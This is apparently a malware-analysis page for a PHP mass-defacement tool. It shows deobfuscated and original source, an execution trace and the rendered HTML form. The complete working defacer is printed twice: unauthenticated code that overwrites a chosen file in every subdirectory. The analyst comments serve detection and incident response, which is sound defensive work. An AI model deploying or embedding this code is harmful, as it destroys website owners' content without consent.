PHP Malware Analysis

mass.php

md5: bfa2adb5a42ea5ebc6d711e3211bb80c

Deobfuscated PHP code

<?php

/*
 * Analyst notes (annotation only; every statement below is unchanged).
 *
 * Single-file web tool with two phases:
 *   1. Every request renders an HTML form with the fields base_dir, andela
 *      and index.
 *   2. When base_dir is present in the POST body, the posted "index" content
 *      is written to a file named by "andela" inside each immediate
 *      subdirectory of base_dir.
 *
 * No authentication, session or token check appears anywhere in the script,
 * so any client that can reach the URL can trigger phase 2.
 *
 * Stable strings for signature and log hunting: the <title> text, the POST
 * field names base_dir / andela / index, and the default payload text in the
 * textarea.
 */

// Phase 1: form rendering. The title string is emitted on every request.
echo "<title>Folder Mass Defacer by Bl4ck Root</title>";
// The font, image and background URLs below are referenced from the emitted
// HTML, so they are requested by the browser viewing the page; nothing in
// this script fetches them server-side.
echo "<link href='http://fonts.googleapis.com/css?family=Electrolize' rel='stylesheet' type='text/css'>";
echo "<body bgcolor='gray'><font color=black'><font face='Electrolize'>";
echo "<center><form method='POST'>";
// getcwd() is written into the base_dir default, which discloses the script's
// absolute working directory to whoever loads the page.
echo "<img src='https://image.spreadshirtmedia.net/image-server/v1/designs/14727496,width=178,height=178,version=1385625201/fuck-anonymous-mask.png'> <hr color='black'><font color='black'>Target Folder</font><br> <input cols='10' rows='10' type='text' style='color:lime;background-color:#000000' name='base_dir' value='" . getcwd() . "'><br><br>";
// Default target file name is index.php; the operator can change it per request.
echo "<font color='black'>Name of File</font><br><input cols='10' rows='10' type='text' style='color:lime;background-color:#000000' name='andela' value='index.php'><br>";
echo "<font color='black'>Script Deface</font><br><textarea cols='25' rows='8' style='color:lime;background-color:#000000;background-image:url(http://ac-team.ml/bg.jpg);' name='index'>Hacked by Bl4ck Root</textarea><br>";
echo "<input type='submit' value='Mass !!!'></form></center>";
// Phase 2: runs only when the request carries base_dir in the POST body.
// In web access logs this shows up as a POST to this file; the parameters
// themselves are in the body and are normally not logged.
if (isset($_POST['base_dir'])) {
    // The two existence/type checks echo the request value back unescaped
    // inside die(); they validate nothing beyond "path exists and is a directory".
    if (!file_exists($_POST['base_dir'])) {
        die($_POST['base_dir'] . " Not Found !<br>");
    }
    if (!is_dir($_POST['base_dir'])) {
        die($_POST['base_dir'] . " Is Not A Directory !<br>");
    }
    // "@" suppresses PHP warnings, so failures here leave no entry in the
    // PHP error log; only the die() text reaches the HTTP response.
    @chdir($_POST['base_dir']) or die("Cannot Open Directory");
    // "or" binds looser than "=", so $files receives scandir()'s result and
    // die() fires only when that result is false.
    $files = @scandir($_POST['base_dir']) or die("Fuck u -_- <br>");
    foreach ($files as $file) {
        // $file is a bare entry name, resolved against the directory set by
        // chdir() above. Only entries reported as "dir" are used, and there is
        // no recursion, so the write reaches one level below base_dir.
        // filetype() reports symlinks as "link", so symlinked directories are
        // skipped by this test.
        if ($file != "." && $file != ".." && @filetype($file) == "dir") {
            // The file name comes verbatim from the request (andela) with no
            // validation. For incident scoping, do not assume every write was
            // named index.php or stayed inside the listed subdirectory.
            $index = getcwd() . "/" . $file . "/" . $_POST['andela'];
            // file_put_contents() without flags replaces an existing file's
            // content, so the previous file is lost and must be restored from
            // backup or version control. The result is tested for truthiness:
            // a zero-byte write empties the file but is not reported below.
            if (file_put_contents($index, $_POST['index'])) {
                // The list of written paths goes only to the HTTP response;
                // the script keeps no server-side record. Reconstruct the
                // affected set from file modification times and content
                // matches under the sibling directories.
                echo "<hr color='black'>>> <font color='black'>{$index}&nbsp&nbsp&nbsp&nbsp</font><font color='lime'>(&#10003;)</font>";
            }
        }
    }
}

Execution traces

data/traces/bfa2adb5a42ea5ebc6d711e3211bb80c_trace-1676251629.3818.xt
Version: 3.1.0beta2
File format: 4
TRACE START [2023-02-12 23:27:35.279633]
1	0	1	0.000305	393512
1	3	0	0.000407	405712	{main}	1		/var/www/html/uploads/mass.php	0	0
2	4	0	0.000424	405712	getcwd	0		/var/www/html/uploads/mass.php	1	0
2	4	1	0.000438	405760
2	4	R			'/var/www/html/uploads'
1	3	1	0.000456	405712
			0.000484	314224
TRACE END   [2023-02-12 23:27:35.279968]


Generated HTML code

<html><head><title>Folder Mass Defacer by Bl4ck Root</title><link href="http://fonts.googleapis.com/css?family=Electrolize" rel="stylesheet" type="text/css"></head><body bgcolor="gray"><font color="black'"><font face="Electrolize"><center><form method="POST"><img src="https://image.spreadshirtmedia.net/image-server/v1/designs/14727496,width=178,height=178,version=1385625201/fuck-anonymous-mask.png"> <hr color="black"><font color="black">Target Folder</font><br> <input cols="10" rows="10" type="text" style="color:lime;background-color:#000000" name="base_dir" value="/var/www/html"><br><br><font color="black">Name of File</font><br><input cols="10" rows="10" type="text" style="color:lime;background-color:#000000" name="andela" value="index.php"><br><font color="black">Script Deface</font><br><textarea cols="25" rows="8" style="color:lime;background-color:#000000;background-image:url(http://ac-team.ml/bg.jpg);" name="index">Hacked by Bl4ck Root</textarea><br><input type="submit" value="Mass !!!"></form></center></font></font></body></html>

Original PHP code

<?php echo "<title>Folder Mass Defacer by Bl4ck Root</title>"; echo "<link href='http://fonts.googleapis.com/css?family=Electrolize' rel='stylesheet' type='text/css'>"; echo "<body bgcolor='gray'><font color=black'><font face='Electrolize'>"; echo "<center><form method='POST'>"; echo "<img src='https://image.spreadshirtmedia.net/image-server/v1/designs/14727496,width=178,height=178,version=1385625201/fuck-anonymous-mask.png'> <hr color='black'><font color='black'>Target Folder</font><br> <input cols='10' rows='10' type='text' style='color:lime;background-color:#000000' name='base_dir' value='".getcwd ()."'><br><br>"; echo "<font color='black'>Name of File</font><br><input cols='10' rows='10' type='text' style='color:lime;background-color:#000000' name='andela' value='index.php'><br>"; echo "<font color='black'>Script Deface</font><br><textarea cols='25' rows='8' style='color:lime;background-color:#000000;background-image:url(http://ac-team.ml/bg.jpg);' name='index'>Hacked by Bl4ck Root</textarea><br>"; echo "<input type='submit' value='Mass !!!'></form></center>"; if (isset ($_POST['base_dir'])) { if (!file_exists ($_POST['base_dir'])) die ($_POST['base_dir']." Not Found !<br>"); if (!is_dir ($_POST['base_dir'])) die ($_POST['base_dir']." Is Not A Directory !<br>"); @chdir ($_POST['base_dir']) or die ("Cannot Open Directory"); $files = @scandir ($_POST['base_dir']) or die ("Fuck u -_- <br>"); foreach ($files as $file): if ($file != "." && $file != ".." && @filetype ($file) == "dir") { $index = getcwd ()."/".$file."/".$_POST['andela']; if (file_put_contents ($index, $_POST['index'])) echo "<hr color='black'>>> <font color='black'>$index&nbsp&nbsp&nbsp&nbsp</font><font color='lime'>(&#10003;)</font>"; } endforeach; } ?>